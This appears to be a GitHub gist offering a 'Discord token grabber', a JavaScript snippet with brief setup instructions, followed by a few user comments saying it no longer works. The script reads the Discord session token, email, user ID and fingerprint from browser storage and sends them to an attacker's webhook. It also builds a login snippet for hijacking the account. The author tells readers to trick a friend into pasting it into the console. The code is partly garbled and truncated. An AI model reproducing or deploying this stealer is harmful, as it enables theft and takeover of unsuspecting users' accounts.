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Last active June 19, 2024 23:27
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Discord token grabber


Here is a simple Discord Token grabber that sends information in a discord webhook. It is very simple to setup, first copy the script. Then where it says WEBHOOK_URL_HERE, put a webhook url and you are good! Now send the script to a friend and tell them to run it on as a bookmarklet or pasting it into console. Both ways work!



var discordWebhook = "WEBHOOK_URL_HERE";
var i = document.createElement('iframe');
var request = new XMLHttpRequest();"POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
username: "Webhook",
avatar_url: "",
content: '**Request recived!**\n------------------\nToken: `' + i.contentWindow.localStorage.token + '`\nEmail: `' + i.contentWindow.localStorage.email_cache + '`\nUser ID: `' + i.contentWindow.localStorage.user_id_cache + '`\nFingerprint: `' + i.contentWindow.localStorage.fingerprint + '`\nMisc data: \`\`\`json\n' + i.contentWindow.localStorage.deviceProperties + '\`\`\`Login code: \`\`\`js\nlocation.reload();var i = document.createElement(\'iframe\');document.body.appendChild(i);i.contentWindow.localStorage.token = "\\"' + i.contentWindow.localStorage.token.replace(/^"(.*)"$/, '$1') + '\\""\`\`\`'
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Also is this what got you server deleted

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Hmm, I try and does not seem to work

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This does not seem to work

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For me

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Arxe0 commented May 6, 2022

This does not seem to work

well, you need to be on and yea

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yeah you need to be on discord
also they are getting pretty good at hiding their local storage so it might be patched

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